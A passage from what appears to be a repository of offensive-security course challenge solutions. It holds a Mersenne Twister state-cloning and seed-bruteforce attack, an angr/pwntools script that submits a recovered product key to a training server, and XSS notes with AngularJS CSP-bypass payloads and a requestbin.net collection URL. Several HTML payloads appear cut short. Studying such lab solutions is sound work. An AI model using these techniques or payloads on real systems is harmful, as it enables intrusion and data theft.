return((double)genRandLong(rand) / (unsigned long)0xffffffff); 76 | } 77 | -------------------------------------------------------------------------------- /symbolic/prng/MTwister/mtwister.h: -------------------------------------------------------------------------------- 1 | #ifndef __MTWISTER_H 2 | #define __MTWISTER_H 3 | 4 | #define STATE_VECTOR_LENGTH 624 5 | #define STATE_VECTOR_M 397 /* changes to STATE_VECTOR_LENGTH also require changes to this */ 6 | 7 | typedef struct tagMTRand { 8 | unsigned long mt[STATE_VECTOR_LENGTH]; 9 | int index; 10 | } MTRand; 11 | 12 | MTRand seedRand(unsigned long seed); 13 | unsigned long genRandLong(MTRand* rand); 14 | double genRand(MTRand* rand); 15 | 16 | #endif /* #ifndef __MTWISTER_H */ -------------------------------------------------------------------------------- /symbolic/prng/clone_MT19937.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright © 2020 Dr. Henning Kopp, SCHUTZWERK GmbH 4 | # 5 | # Permission is hereby granted, free of charge, to any person 6 | # obtaining a copy of this software and associated documentation files 7 | # (the “Software”), to deal in the Software without restriction, 8 | # including without limitation the rights to use, copy, modify, merge, 9 | # publish, distribute, sublicense, and/or sell copies of the Software, 10 | # and to permit persons to whom the Software is furnished to do so, 11 | # subject to the following conditions: 12 | # 13 | # The above copyright notice and this permission notice shall be 14 | # included in all copies or substantial portions of the Software. 15 | # 16 | # THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, 17 | # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 19 | # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 20 | # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 21 | # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 22 | # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | # SOFTWARE. 24 | 25 | # Randomness is the true foundation of mathematics. 26 | # -- Gregory Chaitin 27 | 28 | # This code clones a pseudorandom number generator (PRNG). The 29 | # attacked PRNG is the Mersenne Twister (MT19937) 30 | # (https://en.wikipedia.org/wiki/Mersenne_Twister) as it is used nearly 31 | # everywhere. 32 | 33 | 34 | # An accompanying blog post with explanation of the code can be found 35 | # at https://www.schutzwerk.com/en/43/posts/attacking_a_random_number_generator/ 36 | 37 | 38 | # The internal state of MT19937 consists of 624 32-bit integers. Each of 39 | # those correspond to an output. In particular, there is a temper 40 | # function that maps an integer of the internal state to an output. This 41 | # function is invertible. I.e., there is a function "untemper" that can 42 | # even be computed analytically. 43 | # If I have 624 consecutive numbers from an MT19937 output, I 44 | # can recover the whole internal state. 45 | 46 | # I use the implementation of MT19937 from here: 47 | # https://github.com/james727/MTP 48 | 49 | from z3 import * 50 | import time 51 | 52 | # heavily based on https://github.com/james727/MTP 53 | # Usage: 54 | # generator = mersenne_rng(seed = 123) 55 | # random_number = generator.get_random_number() 56 | 57 | 58 | class mersenne_rng(object): 59 | def __init__(self, seed=5489): 60 | self.state = [0]*624 61 | self.f = 1812433253 62 | self.m = 397 63 | self.u = 11 64 | self.s = 7 65 | self.b = 0x9D2C5680 66 | self.t = 15 67 | self.c = 0xEFC60000 68 | self.l = 18 69 | self.index = 624 70 | self.lower_mask = (1 << 31)-1 71 | self.upper_mask = 1 << 31 72 | 73 | # update state 74 | self.state[0] = seed 75 | for i in range(1, 624): 76 | self.state[i] = self.int_32( 77 | self.f*(self.state[i-1] ^ (self.state[i-1] >> 30)) + i) 78 | 79 | def twist(self): 80 | for i in range(624): 81 | temp = self.int_32( 82 | (self.state[i] & self.upper_mask)+(self.state[(i+1) % 624] & self.lower_mask)) 83 | temp_shift = temp >> 1 84 | if temp % 2 != 0: 85 | temp_shift = temp_shift ^ 0x9908b0df 86 | self.state[i] = self.state[(i+self.m) % 624] ^ temp_shift 87 | self.index = 0 88 | 89 | def temper(self, in_value): 90 | y = in_value 91 | y = y ^ (y >> self.u) 92 | y = y ^ ((y << self.s) & self.b) 93 | y = y ^ ((y << self.t) & self.c) 94 | y = y ^ (y >> self.l) 95 | return y 96 | 97 | def get_random_number(self): 98 | if self.index >= 624: 99 | self.twist() 100 | out = self.temper(self.state[self.index]) 101 | self.index += 1 102 | return self.int_32(out) 103 | 104 | def int_32(self, number): 105 | return int(0xFFFFFFFF & number) 106 | 107 | 108 | # compare with 109 | # https://blog.infosectcbr.com.au/2019/08/cryptopals-challenge-23-clone-mt19937.html 110 | 111 | def untemper(out): 112 | """ 113 | This is the untemper function, i.e., the inverse of temper. This 114 | is solved automatically using the SMT solver Z3. I could prpbably 115 | do it by hand, but there is a certain elegance in untempering symbolically. 116 | """ 117 | y1 = BitVec('y1', 64) 118 | y2 = BitVec('y2', 64) 119 | y3 = BitVec('y3', 64) 120 | y4 = BitVec('y4', 64) 121 | y = BitVecVal(out, 64) 122 | s = Solver() 123 | equations = [ 124 | y2 == y1 ^ (LShR(y1, 11)), 125 | y3 == y2 ^ ((y2 << 7) & 0x9D2C5680), 126 | y4 == y3 ^ ((y3 << 15) & 0xEFC60000), 127 | y == y4 ^ (LShR(y4, 18)) 128 | ] 129 | s.add(equations) 130 | s.check() 131 | return s.model()[y1].as_long() 132 | 133 | 134 | def recover_state_mt(numbers): 135 | """ 136 | This function recovers the internal state of MT19937 given a 137 | sequence of outputs. Note that there can be multiple states of an 138 | MT19937 that yield the same sequence of outputs. 139 | """ 140 | state = [] 141 | for n in numbers[0:624]: 142 | state.append(untemper(n)) 143 | return state 144 | 145 | 146 | def main(): 147 | """ 148 | This function tests the implementation. 149 | We clone the RNG from its output and compare the next generated 150 | outputs of the real and the cloned PRNG. Then, we try to recover 151 | the seed. 152 | """ 153 | random_num = 0x75cd873 #input("Input random number: ") 154 | 155 | for i in range(0xffffffff): 156 | s = time.time() 157 | rng = mersenne_rng(i) 158 | for j in range(1000): 159 | rng.get_random_number() 160 | chosen = rng.get_random_number() 161 | print(time.time() - s) 162 | if chosen == random_num: 163 | print("Found! Seed: ", i) 164 | 165 | print("WTF NOT FOUND??") 166 | ''' 167 | rng = mersenne_rng(1337) 168 | print(f"real internal state of PRNG: {rng.state[0:10]} ...") 169 | random_nums = [] 170 | print("generating random numbers") 171 | for i in range(624): 172 | random_nums.append(rng.get_random_number()) 173 | print(f"generated numbers: {random_nums[0:10]} ... ") 174 | print("recover internal state of PRNG") 175 | recovered_state = recover_state_mt(random_nums) 176 | print(f"recovered internal state: {recovered_state[0:10]} ... ") 177 | print("cloning PRNG") 178 | cloned_rng = mersenne_rng() 179 | cloned_rng.state = recovered_state 180 | 181 | print("check equality of next 1000 outputs from the real and cloned rng") 182 | for i in range(1000): 183 | assert(cloned_rng.get_random_number() == rng.get_random_number()) 184 | print('Success!') 185 | ''' 186 | 187 | 188 | if __name__ == "__main__": 189 | main() 190 | -------------------------------------------------------------------------------- /symbolic/prng/pnrg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/symbolic/prng/pnrg -------------------------------------------------------------------------------- /symbolic/prng/sim_runner.py: -------------------------------------------------------------------------------- 1 | import os 2 | from multiprocessing import * 3 | import time 4 | from pwn import * 5 | 6 | if args.LOCAL: 7 | r = process('./pnrg') 8 | 9 | number = str(int(r.readline().decode().split(',')[0], 16)) 10 | print(number) 11 | elif args.REMOTE: 12 | r = remote('training.jinblack.it', 2020) 13 | 14 | number = str(int(r.readline().decode().split(',')[0], 16)) 15 | print(number) 16 | else: 17 | number = '4241769204' 18 | 19 | processes = [(str(i), number) for i in range(0, 0xffffffff, 100000000)] 20 | 21 | 22 | def run_process(argv, event): 23 | print(argv, event) 24 | out = os.popen('./simulator {} {}'.format(argv[0], argv[1])).read() 25 | if out.find("FOUND") != -1: 26 | print("SUCCESS ", out) 27 | event.set() 28 | else: 29 | print(out) 30 | 31 | 32 | print("start " + str(len(processes))) 33 | s = time.time() 34 | pool = Pool(processes=24) 35 | m = Manager() 36 | event = m.Event() 37 | for proc in processes: 38 | pool.apply_async(run_process, (proc, event)) 39 | pool.close() 40 | event.wait() 41 | pool.terminate() 42 | print(time.time() - s) 43 | 44 | if args.LOCAL or args.REMOTE: 45 | r.interactive() 46 | -------------------------------------------------------------------------------- /symbolic/prng/simulator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/symbolic/prng/simulator -------------------------------------------------------------------------------- /symbolic/prng/simulator.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "MTwister/mtwister.h" 4 | 5 | int main(int argc, char **argv) { 6 | 7 | unsigned long seed = atol(argv[1]); 8 | unsigned long guess = atol(argv[2]); 9 | 10 | //printf("Seed: %lx, guess: %x\n", seed, guess); 11 | 12 | for(unsigned long s = seed; s < seed + 100000000; s++) { 13 | MTRand r = seedRand(s); 14 | int i; 15 | for(i=0; i<1000; i++) { 16 | genRandLong(&r); 17 | } 18 | long gen = genRandLong(&r); 19 | if(gen == guess) { 20 | printf("FOUND %lx\n", s); 21 | break; 22 | } 23 | } 24 | /*else { 25 | printf("Was %x", gen); 26 | }*/ 27 | return 0; 28 | 29 | } 30 | -------------------------------------------------------------------------------- /symbolic/prodkey/exploit.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | from pwn import * 4 | 5 | 6 | if args.FLAG: 7 | flagge = b'532836543989882060490007480756694257617764354509435740546591436540753920' 8 | r = connect('training.jinblack.it', 2021) 9 | r.sendline(flagge) 10 | r.interactive() 11 | 12 | 13 | input_len = 30 14 | 15 | prog = angr.Project('./prodkey', auto_load_libs=False) 16 | 17 | find = [0x00400e58] 18 | avoid = [0x00400e92] 19 | 20 | input_flag = claripy.BVS('flag', input_len * 8) 21 | 22 | state = prog.factory.entry_state(argv=['./prodkey'], stdin=input_flag) 23 | simgr = prog.factory.simulation_manager(state) 24 | 25 | simgr.explore(find=find, avoid=avoid) 26 | 27 | if simgr.found: 28 | found = simgr.found[0] 29 | flag = found.solver.eval(input_flag) 30 | flag = bytearray.fromhex(str(hex(flag))[2:]) 31 | 32 | print('flag:', flag) 33 | if args.SOLVE: 34 | r = connect('training.jinblack.it', 2021) 35 | r.sendline(flag) 36 | r.interactive() 37 | 38 | 39 | -------------------------------------------------------------------------------- /symbolic/prodkey/prodkey: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/symbolic/prodkey/prodkey -------------------------------------------------------------------------------- /xss/babycsp_exploit.md: -------------------------------------------------------------------------------- 1 | 2 | // http://requestbin.net/r/b6nz0c3q 3 | 4 | "> 5 | -------------------------------------------------------------------------------- /xss/csp/exploit.md: -------------------------------------------------------------------------------- 1 | # Exploit 2 | 3 | Nothing on the first page is exploitable 4 | 5 | On the other, though, both name and comment is exploitable. 6 | 7 | Load angularjs from ajax.google.com, then execute code. 8 | 9 | From the jsonp repository: 10 | `ng-app"ng-csp ng-click=$event.view.alert(1337)> 11 | ` 12 | 13 | we can download angular, then open a div with malicious code: 14 | 15 | `script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js>
` 16 | 17 | But this violates csp style... 18 | 19 | but heeey with angular we can put code in `{{ }}`. 20 | Then I discovered that `{{constructor.constructor("alert(1)")()}}` is a valid payload! 21 | 22 | Exploit: 23 | 24 | ```html 25 |
26 | 27 | ``` 28 | -------------------------------------------------------------------------------- /xss/strict-csp/exploit.md: -------------------------------------------------------------------------------- 1 | # strict csp 2 | 3 | From Black hat 2017, require is vulnerable to this: 4 | 5 | `` 6 | 7 | SO: 8 | 9 | `` 10 | --------------------------------------------------------------------------------